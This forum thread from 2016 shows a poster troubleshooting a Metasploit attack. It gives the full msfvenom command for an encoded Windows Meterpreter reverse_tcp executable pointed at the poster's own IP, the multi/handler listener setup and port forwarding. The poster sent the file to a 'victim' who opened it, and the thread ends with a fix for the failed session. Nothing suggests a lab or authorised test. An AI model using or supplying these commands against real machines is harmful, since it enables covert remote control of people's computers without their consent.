!_ync3 Posted February 23, 2016 Share Posted February 23, 2016 I created a reverse_tcp payload with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=100.xxx.xxx.103 LPORT=443 -f exe > /root/Desktop/Payload_reverse_tcp.exe The LHOST I've used was my Internet IP. The payload was succefuly created at my desktop. I've than port fowarded my router to foward any conection threw the port 443 to my local IP. ex: 192.168.0.20 I've than started msconsole and stared the listner: msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp show option set LHOST 192.168.0.20 (MY LOCAL IP) set LPORT 443 exploit The listner started correctly and waited for incomming conections. I've than sended the payload to the victim. The victim opened the payload. But the the listener did not start a session. I've than used the command: nestat -antp to see if the port fowarding was working fine. I could see that the victims Ip was trying to connect, but the session would not start. Could anyone help me???? Quote Link to comment Share on other sites More sharing options...
!_ync3 Posted March 3, 2016 Author Share Posted March 3, 2016 I figured it out! For some reason the port 443 was not communicating. I just chaged the port and it worked. ;) Quote Link to comment Share on other sites More sharing options...
Karel Origin Posted March 28, 2016 Share Posted March 28, 2016 I figured it out! For some reason the port 443 was not communicating. I just chaged the port and it worked. ;) Because port 443 was probably already used by someone else Quote Link to comment Share on other sites More sharing options...
Karel Origin Posted March 28, 2016 Share Posted March 28, 2016 I mean something else lol. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.